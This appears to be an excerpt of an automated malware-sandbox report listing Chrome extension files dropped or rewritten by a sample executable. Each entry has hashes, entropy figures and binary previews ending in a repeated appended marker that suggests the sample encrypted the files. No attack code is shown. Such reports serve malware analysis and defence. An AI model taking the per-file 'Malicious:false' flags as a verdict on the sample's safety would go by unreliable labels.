                                                                                                                                                                                                    SHA1:8DA721A01C87A008E53CB0C874CA3C3321F9E80F
                                                                                                                                                                                                    SHA-256:19447D0C34245074B0403F49A3F75F1A0930E406D6688B1C3C5113C7B4883305
                                                                                                                                                                                                    SHA-512:5F476EEBEB245B7105AC13B982908C9C21C611D38C59DF126715F2BD2AE9ABD55CE16E498DC2E08C3A0A21D7E48A664A3C7BB05D0F535E2AD2EA9B89B5EC6A7B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A..\..O.......e..6Z.p.\...k.*...\....J.V1.p.{] .x...6...s+d.)>...nf...{..?H..6{...Dgc{.`&..Z.9..I1){.......k.I,..'.2.1;......i..e..A..B..35.n.y.....\.N...O../.(.}.l...8.......i....:l[....jh7.....B:..GY..za%..f......#$\9w4.]...Q.M..(..J .|...*.;.G.$S>.h+QiL..............n...^?.w."Z.2..dM...1. ..{...S.....v.....9..z.....u....^ ..L.p...d.....D...cG.=.uNc.>;cci.s^. ...$m.w..sl....1X,.k.b..f...x2..=.a.. ..FYi.....O... .....".......Um.kE*..c6,..e.;I....O......~2.3..M8..u..b .3d.*....a.......t....r...S._ ..0......&H.1q....h..9.nF=...X.E.D.../...iT@.(..Y]:.Y.S.k.9.CX. .2_#...-.n...{9...GP.:..(...M.\.Tch.....#8#....5.T.J.A.5..RP....2..f.c"....8.~..1cN..tA.)y\c..z...v.N"...<.Sj...u.!..n......q6.~y'O.*.b.3D.].R.....Cn!R.E).?........./...nA.L..G..J.r..v..@..i.0.....0.#Gq~HK.0.v0.....D.9O...6...n...lr..N.B..P.W..;.t.?.......hP.V......6XQ.W..q..n..g.af4.[:...(.r..s..H.c...-.x..:'c.+.u.w0...qskf.#@.._l..I..fM...w. 0..;...._.ZZro.$./...)yo..X3.&2u...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3701
                                                                                                                                                                                                    Entropy (8bit):7.943117760849181
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:bZKK7dHMGxq0ymMe2U5c2atlSjgw/uSJJ5L7xpimA:bZzRHMGc0ieHLE2uSpxzA
                                                                                                                                                                                                    MD5:AC674CBBBAEBC33A7E4AC78316EB4AD0
                                                                                                                                                                                                    SHA1:2A29C2C4EED05CC18BB8611501B1104C49E7FD33
                                                                                                                                                                                                    SHA-256:D99B187C68BD2F0160E24949BA79C952BAB832A09A875341403FA89CF050C9D7
                                                                                                                                                                                                    SHA-512:2937AEE2DD5103CEBC15EC49C03E21C0576D93485BEF48A3D496F933E3322CAF7261F045ADC205AA3D8CDEF110A86F1C138A8669CD874D8BE1425C9A8DD3DC4A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .L..V..S.?(..O.....n..kL..NoI....8B.4{..8..P...|.f....].{w..<<....X.*..v...*I8........7[..3vl9...].....B...U.h.s.".Z%.......s.lM0..j..Z...T...\..).$..u..|Q.U(.;..i.@...gj...E{.p?..S2.6R.._]|.,....].aN..-6...g.@...>..Qug...$...E.|.r.\........U......x....?.O)8TY.(:.<..r.\.9.....<......7.S..io!.>.1.C'..p..l.E.D8.......p|._..3.Y^...E......:.....3..m...N.L|$3S..Q.lA"py..8Sy]oHk..,....D.&.M&... .zl<....c.....O-w6.~D.....e..e.|.z.p>.`...."<:....1.wK.>.i....p\m}..Y.n...K.5.r...x...I.=..B...z..........)...sGhw.+Tw.F..#.B..9.O.....6....!.+..-...@.aV.......K.9...L.r..*..Pj.........Y......tA....EpR..)&.*.!.Kg...J...m_p. ...G43?..u....N...F"....0...+5...U..OS-. ..yY.dezU..G.1..=t.<V..s.9t.-g.F.>.$u..l8..{..R7..f..~....r.!.).8.....\U`[.`.....eP^.7..u..'.*iW*~.e..).......$.%=.o.. ....-.'}.P.UH......k....T+=3...._...C:8j.....<...e").y.&+.M....a^.L...ac......4.A...=....V0..%...4..%.J1.Db..q......a.|S.|.$.....Y:....v.c............I.S......N..uBe.!ua.p1.>.7..m..K.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):489
                                                                                                                                                                                                    Entropy (8bit):7.50792016364041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:24DSCDNy7rL/1tKYcD/yo5O+B2Voq2cii9a:HWAKrL/1tKPrj5i2bD
                                                                                                                                                                                                    MD5:18484B7DB210CA55C76F25D701DB1FDD
                                                                                                                                                                                                    SHA1:38630A1719115E58CFD03DBFC1A5A6F9740B8522
                                                                                                                                                                                                    SHA-256:096A7CD99D8D2F67D2A4F002C83521FFF03BD7F5A05784F2CD5A687917F89C4B
                                                                                                                                                                                                    SHA-512:9020B666D2B9C48CDB95990819AD231B3E37FCDFD2132E81161758DD4CCDD0E0B690C4E48DD07C7EA9B16288AA5918E5FFA237C7D0A812C6C390670980D93D3C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .{.M....[....s]...\.....G...L.....ft...W..A..S\...|.j...m....s.hA&cr...x.1.h...h<%X37....c.o.6t\a.3W..#.o.....75#..i..X...kp".;..|..Ml.I....x.e.... .%.+..'...3..U|.t..u.4^JL..C.\..)....#...@.9.._$..&|A&..9.t.vf...>;&9....Z{a....N..q...V.j..%ap..D.M.......<..-......M>.U. ..Z.....H2;..6v...U.C.kE .#U..Kcq...c.=...?..D.......,"....H.J..B0.[&.n..!.x..........n....M2\.}r....g...Sy.!..8.9Z?..-5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.html
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):421
                                                                                                                                                                                                    Entropy (8bit):7.364988205011141
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:KrDcLLgTC2/p3ezekOz4Ohy3BVmkfO+es90kHTaeIVt5sNpXUzMD51l75dExciik:HraeOcjm6RUkHsqNT1ucii9a
                                                                                                                                                                                                    MD5:7856257919C74D6EC1264A6D0AB4F678
                                                                                                                                                                                                    SHA1:6B277C884BCE16606285CD59FF67F8E2EEBAC9FA
                                                                                                                                                                                                    SHA-256:D278CD38165715627C90027E8440B7E1C5AD32F5D6C623539663A447C6BDEE85
                                                                                                                                                                                                    SHA-512:6AB1D5B81602AAE8AAAF6A61597A2933A00D568348D2AD1BD2B0379C3920F8ABD6279A00EB365FACCB6E41D83295B4BBF8DD0D7CC6D9362726A410C48B4C2F9E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n,My.4.h......`...T...2.].ZOBJ.n...[....B.f.d...=_0....+.>.\..mY...R...2.zO.+.$......c.'.*.PR.(.*.V.7......z...M..o1>U..f..JAQ.P..H.[.P.......78(w..1o....~...cA..AAZ...{.....A..Z..U..*kw......v.w.....#{....G...B.....].%.sU..p.@&]H+.8`2..|.dD.{...%1{..9..}w...GM.5..-.]..2..H.....n...D......=.M........Me&Yd.?.,...3.0.#.\u..\m!<;<Wy5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):424
                                                                                                                                                                                                    Entropy (8bit):7.393596604601249
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EQizm/+haZ9twObLNNU8Ks+FPOyicii9a:GK/+gRwOLN28Ks+FobD
                                                                                                                                                                                                    MD5:8352749D0193677B500861ED4051BD61
                                                                                                                                                                                                    SHA1:8CB449FF5919C2E0DE0894658FC7337693178015
                                                                                                                                                                                                    SHA-256:B56DA586A020280D803FF663085EF1A036CF55F941799A38C6C2AF491DBDD622
                                                                                                                                                                                                    SHA-512:E7A333DE1818CADE75C08C3363DA75A67A19562E64B4001781312601B53C0A91A08A4B557F44CD1779DA812E952B7D3BE07EE777AA3220ECEEF0AA833611E04E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....I.yi<K.S..l..Q,..W.~.6....n[3..o.B..m..[.]....s~.]P...6Vc*..52.\..f.l.!.J.e24...'.g..z.f..y).b!h...|......}..4......R..b~.IM...w.-.T?...v..D..{.....w..a-$..g...1....O'..$..>...J/...L..l...`g....XY,do.M.zE.0.a.MEu..S..>..Z1..as.MR..l......}z..f.....|eZ..8.V7.Z8&...._...<.....V.O/..y..Nc5.@.,=...w.{c.x.....n.=..B*..g...u."..W..-5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1055
                                                                                                                                                                                                    Entropy (8bit):7.816663415638379
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:XWzG4ZeIFoUMvjgyDNaK1MKoIrIoJV0yNoHEv0XbD:XWVXFotguLHrIc0yky+D
                                                                                                                                                                                                    MD5:D203AA69FDF14E8F22B6A23A3AB7BA7A
                                                                                                                                                                                                    SHA1:EB3FF2A753CB3CE578FB341EC6CB00021D4852C8
                                                                                                                                                                                                    SHA-256:DE7B1FE85312063BBCEE0D86109AED82EE122E7A5EC6EFC03CD123D8592CB9A5
                                                                                                                                                                                                    SHA-512:96C5A4E811E321024D3E487A19777C7611AFF4A154857F16337E0EDD78F243D1AD9157F190BE36F6E4ACCA7ACD24F540DAC5FA811D64A3B59DF68868F1914718
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .ZE.%!`.B.W.@k.ZB+3...J.`........$.../.k...'_..j....?.3r..r.P.T......;:.u^Otx.\.K.o8[!.....k...1}.z.t..<...{..{f.../S......b._...^..&...nt...,...y.U~Xu..X...K.m.w..Q.\...I'......O.........L......!..i......BsQ.X ....;..H.J+.}....,..L.....n..V..xH...E.K]..>.X...4........iV..91d..)5.....%..X.].ud.........H..b.T....{.ZW..&J...S:.[I..L.I~x..n.7.Y...........SE../d......."P...j..z.i..._-*tM.d....\....Sb...5|.Ty...7..QXs.......:.4...jE...p.l..aX.01.}.....[...O.jR...E.....s&T.y.~[.{...`4o....m...2.Lp..y`~h..$.t.J.y+..a=...<TQ.2.&Z..[[X..... .c...l....O~^.K"...w.........U..D..xj.v.......}...%a[_..W@.p..G...K..P._.c..I..R..,.q...VN.%~....*$A.>:....G...x..hh/A...F.o..Q...kSP.. .6...y.).-.z.Z..-n.9.e..}r.....................*.~.....h.........y.....8.fdv:...bx.M/9....@~....>....3&.$.zL=Ani8..6.....1H..BzE.....r..)....09Q....W...X....ns'.1O.I@..pp......W.,.....v.i.y.,..G..........{...'k.h.e.i..g.0-..-....-b.Q...<;.".Yt...kh...5VPEIoxEWaaB5A242LGR5OT
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):488
                                                                                                                                                                                                    Entropy (8bit):7.502564829500189
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:PGgH7obzVAZOAwJhtRpm2TyTla3HiTrW+HdrXcii9a:dSV7Ad2TyTluinW+lXbD
                                                                                                                                                                                                    MD5:34D3D91EEF2E585654B2F54624A7E1A8
                                                                                                                                                                                                    SHA1:AA2B4F513786BA0E0A074AD98F0DFBBD2FDCA5AF
                                                                                                                                                                                                    SHA-256:4FA24AB7FB392DAD788B65C777EF850C9EA4E57DECC6B18DEA49A8BF35AFDACD
                                                                                                                                                                                                    SHA-512:472987EAFA349963315409622A1E9FD3D51288B3A7873C8241481EDB8347AA280101BD4BDF60E0A91F04F41148776E9B5A3156FA347805772B5B214DD1A1EC6C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {X.1i..`8E.^.c'.B.Vgt...2.a[........:!V....n.E.!.X........K.....Hy....3.:v..R....znQ..L.M.=....0gv.uh\r..].O..u&.@?....M...8%..Mc....:f..........b.i..Y...`.UT5....Xy........D.....$(......c...z9.Tl.W[.....[Y.g..M..?.....H.._.........Y$..43.....g....+.!xy..K..$.3..P..?z..Z..#.k...j..j..#...|?.*...M.+.*.AF....".5.gM_.y..l.|~../.{.W...ym\...mR.?)..F.Z{.|N&;jm.xU:..tM.a.B.U..h.0rQb....vQ.e...n5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):509
                                                                                                                                                                                                    Entropy (8bit):7.551421371289577
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:xGEBeNHp5fYjvgHIUnTrZPb559gwKYcii9a:xGEsNbfYTgjXZt3FKYbD
                                                                                                                                                                                                    MD5:EDFC183E6A6306908A5CB51AAFDFC511
                                                                                                                                                                                                    SHA1:8ECD7BD9E8F7AAA5E6CF7C9842F60F64DCF685C9
                                                                                                                                                                                                    SHA-256:7358F3AB8E2A1EE7D7343FD24525B6E086AA3CF8D9CEB065E36B13D3B7A5D647
                                                                                                                                                                                                    SHA-512:D7BC8AB6854403222F32A82D4A18D6FA48CF2BE7B7E2CA1424EDFDB9F57EB332C2A36430AAD920BC1C3C9A8285D443AE1233C69D7C91FAA259DEBA42B77DE495
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: >K..V..H....Q..a.Q)GZ......u(W-I..7..?oE{.#.K..:~.}<.|.=.......c)rQ..)..2......d._...T.P.b...l.... ..uV1.......>.~.h..q.&..KA..h.xrV..aUA..F.C.x..}z....Q..2>......(..........C~........)<RH..V...rI....."M..3$/..(.J.\..I..|.c...,G.&.........F.v.i/*7+..g.a.....lm:.....m...........w........ebN....P0...@sy.x...J..<`.a#.5.P.;..j.d.o..k...M... RaX...}..r0FE.....R...X......Q....S.v.Y...........y.=O.'aX....0.8.E.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):455
                                                                                                                                                                                                    Entropy (8bit):7.407918492811728
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:XGpT73UT62jv5tisjFFs+4fTGlbU74swGUAqFHbFcii9a:XGpXuxtisMVilb67UXFbD
                                                                                                                                                                                                    MD5:F20DD9A82A6A8D98A6C549ED987D1E9D
                                                                                                                                                                                                    SHA1:799BDA00B6294D3DDE40AF18A17DE739C8CDB6D1
                                                                                                                                                                                                    SHA-256:C408A563697E2EBF143295D40A47A58137427A98CCB4786C3C367A0642A05413
                                                                                                                                                                                                    SHA-512:D02114C26312109DF2E67B4EBF2FEFBEE2F5AA4378515293E1EB28052DC0A31731F6E4FA3D5400F00A3CDBFF2F227125C31FCE91981DD214E51A31A39B53F372
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..N*.E.....H.bxl.[R.!^.Hr.n.{...q./.r.....se...%f..Qt6o.&..1;..Gn...,..=/S......awtp/..d.'...D@.k.o...R..P...4.....c..7....$@.^...C..|HC..j..pyB.".?..VQ..W.2..4...,<.\C...;e=b<..K........<.....@.......).l@..2...$@..o..w.pAB....X..Y...L.I....EZ.n.t`.J..JD..r..$.j.~v,......E..0..$.$t.X>........].g#...#."K..h..C.....8.!....<....Wr....)..>3._.....#D.._w...[....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:little endian ispell 3.0 hash file,
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):468
                                                                                                                                                                                                    Entropy (8bit):7.435202974497873
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:U0oVGlpc2ADM9AT9YxMKyeeeDrfXEuxo9OZYSBcii9a:UOc229YxMKyeeiDUyGAYybD
                                                                                                                                                                                                    MD5:68E33B70112568DD25F4446F1A645B04
                                                                                                                                                                                                    SHA1:3D8EE124430340FD952EF3F00EB01994E387DB87
                                                                                                                                                                                                    SHA-256:9D24735AB4C5BE834E788D1E806A58379D2B5816BF28FE868535F85B6FB3E4CE
                                                                                                                                                                                                    SHA-512:C965C29198D7D0AE467E561955733E8A2B4C1874628E095EC651467F87A8EBF4D27EF7434336AB42EC6CF20589F1603081E48B2713E4C1DC40385F29A64C5755
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Mp.O..0i:J.V....P.,m}..!..C."p@..K...W.........._..F.Do.{.__..vfEp.}.&.*.).c...T...K.....h>:.z.n.V.)L...............m....c<..X...Uvk.%.d."..q..Eva.l..o....,.m..-.....9.Il.Q..W.G3B...C.H.n{.0....+.k.Y..1.q.iA..6&4Q."(+..k.".X., ..^.....2.F..P...f....V.#.f..@..I.Kos....u1..Q.I#.q...{.w.Z0...C.6..1.V......EY.tx.\EI.S._.y>|:.X..I...~d..t..*S..<\.f.../%&.....a..L,.H/#.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):455
                                                                                                                                                                                                    Entropy (8bit):7.414663133671597
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:wFrXDRPdxImGZk1GhDZE+aNsxZAw6Ay5cii9a:wJNPUrZ/iijAw6Ay5bD
                                                                                                                                                                                                    MD5:514167BFB5BD5945A718F8FF540EF03C
                                                                                                                                                                                                    SHA1:C160A1ABEC66740DC1ABF4605A71EC9D3DC34B46
                                                                                                                                                                                                    SHA-256:ECA62695D35433620F79AC3356C3BA1178FBF57AAA461DADAE9EC294A7652BB0
                                                                                                                                                                                                    SHA-512:E177D88F2F187C9F21B6FA7968763CC16C6B5CB3F130F87E9E32863ABFDDA93C0FA3555F7702371A7D657B9916D1F5CAD031D5E036AF3D57000A59E2F04E2CF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: _....6..4..,.-...$..T...)iY7..'...q..'<...`..>...Ct..K.!...N......Q.>C..fN...Bs...V_.bE..>.,.{..Y.~1H...........@!...'Z..~f..c.....nv.uiHW...c....q.j.:5.E..".FEO..+>..KJMT.~..H9.`..<.R.....'.....7ZB3E.5x..[-.....]a..n.K.........g.u.LE.ud..z..>U...z....l.*...Qm.k.C..H-..a.R.G..`.(!.g>.@-hSt`...C.<..B'....a$u)....(....H.E......U..t.rl1..u/..y.OW....d"5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):462
                                                                                                                                                                                                    Entropy (8bit):7.426749558208528
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:U2bGQ1d8e1ySB06G/HKI0FKa9JYt0slF6ocii9a:U2qi8e13HG/HKIW9JYbtbD
                                                                                                                                                                                                    MD5:F939D36F75F42539077911ABA8069082
                                                                                                                                                                                                    SHA1:E4A4E61ABC3302FB30C016C9A8D2095947F6B66E
                                                                                                                                                                                                    SHA-256:374EDF33F9EBFADDACC440CE83C2D1B7AFB5B1DF36B9A16220639523A3E97F94
                                                                                                                                                                                                    SHA-512:3CD927242C4D1875DC20E8A4682F92924659ADDF80946120F162DCEB6A6C71059D055878CBD7EAA1EB643492B87C7FB35172C6D3D99AA2399890CAA9BA1E1D7D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /.B.I%...a|q+.fH...?v..`.~8.21...[.(..j%...).=_X0}...#.-.fH>......^....Q.i7.....=.6..j...(.Q<......ot..?....V..9..Z.9`..~.O.8T&.......!.7Il..a.S.Z.."n...............I2HT...o.....y`T5...#D.+.S....IT...>J..`(.3.>..f3.$...}r...+...D..X9.....<2...R!R.9....U1 9.Z.Q:..S..f>.I..=...Ue...^.....g.... .......m...........z..VQ...|<.3.E..N.w......%X..ysj...k".f..[.a..q..R5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):505
                                                                                                                                                                                                    Entropy (8bit):7.489934313687514
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:lkwcSGdihLZbUEg6TDQ0ILQmW8C7V9J1LBycii9a:lmSbFAD6VILQuCx9TBybD
                                                                                                                                                                                                    MD5:8D33423454D8E8F8DDD7B25121C2905F
                                                                                                                                                                                                    SHA1:F77F39B132531A6997442E331D1E8719345F595E
                                                                                                                                                                                                    SHA-256:5567B026C5944798F2E8B36C30B38004AE96C5DEDAB4949543DCC3F9D13C9DB4
                                                                                                                                                                                                    SHA-512:35991475E707A5454AA1F1B5C1CCA6DDE913AD80BC49C2B9BF5531152F491CC46587D8C6B80053CE6E12AB2715F389A50157C72F434BA5A567841275AEA5FEE2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $!..'...&....Q...Ay..vT<F.W.._..b|.2n...6m.6.!O....nx.;....=..d|...e.....:...I.jF7.o..A.y.....p..]..[KbU..\.t....`.}..a............I..H.:3Q.~.....].T.....;......3T....Ag..*..F.z...!...(.6.......{w=B....q/..@7..z.}..o...)*V..b...$$d.rBK.nbP..@.P...2...R=.5...h.w.....r.....^.).e+.$.q..7K0..UYi8_3.....O\Z.....F.nN..xo....w.|.....4..)*0....f..f...r(.vw...m4.o..Z...Bh...D...i..yi\....L^.tvG..\..}G.K16...i.E.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):453
                                                                                                                                                                                                    Entropy (8bit):7.434814033883126
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:H9t/JCu/65TzxnzMXjpNoZhL4GIFUUHvtXcii9a:ddJCtTFejwZhMDNtXbD
                                                                                                                                                                                                    MD5:515BF893F8200F16C33F1C88342DAD41
                                                                                                                                                                                                    SHA1:378A2A048A9C58216C350E720C4DA3F986DCFA23
                                                                                                                                                                                                    SHA-256:629AC87585BCB2FDF16970FEB03856A2635B913B2C1597E21B78308DB93E38B1
                                                                                                                                                                                                    SHA-512:42DDD37B11B1B4B822CCBCE378CC562D2A76C4EAD2A37117A687E5DD8E385AFDA24E71E13AD58307726701ECEEAA5C3570CE176C3481461049A497829C7FBECF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .B..hr...5..xQ....w....b[.H.[..`#_l.R.fT,....~a>"=.........1."..rHM.{Zq;..Agv?....=].....aT.@.....%.....Q_o..|~.+8......SQ~.h...)...c$..4....Ib.D...HkK7..T.,...~...& =..s..:.y,.$|....fA'k.$;F...C........M...TF...~...._...Q..xz.)..M....R`.4..-.9....9..fD._.....S..j..r.+.Q......Fv.V.:..;.'ya.... \..w..........N..`..M.S|.rI:.~....(..".....H{Y.4b...i........5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):531
                                                                                                                                                                                                    Entropy (8bit):7.4885367314928
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:d3DKPJQ12ULVhOPy0n/YFrcQqRyLDIZqT9O4A2Rcii9a:d3H08cyfc+zpX1RbD
                                                                                                                                                                                                    MD5:BD5E0492B23331A8DEEADA39D75DCB08
                                                                                                                                                                                                    SHA1:07A558D20E6BD3948F1152DFDC98E3362F41A54D
                                                                                                                                                                                                    SHA-256:AED0EC41428575247C3FF6A3848CD3CE6BDC7DCD53BF29F624B69FA6E588DE6C
                                                                                                                                                                                                    SHA-512:248B504F3DEE11362830B86A670F069F59C237B8DE085BD86B0D5F33B747BEC269D6251B42519377342CE340573A6729BC852514719BFA14FEAF1E75063BB701
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \.h.~..[......64....-..%....{......<....<0..J..TSo..H...la1...fL.._.p.....D.(+C.H..!..p.YA...9...1.].}w........Y..=r}....Q.j.W.0.......[.B..o.h.W..^kI.*...xDy....`.U.~.....Q...Xl).2.4..O~g.1....r..*.......8.F.....t...>...i.'`...#.2..w(.. {....}:.x..'ZI..ef..X..,L......M.....4499Yt..b<.6..V....2...#.g).%.4.t.RO#...l...l....E...s.&.y.?w.f.4.O.D..K.{..r...6>..>...u.._G&....<...ya..w....1.."....@.........j..b....m...jR.@.G.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
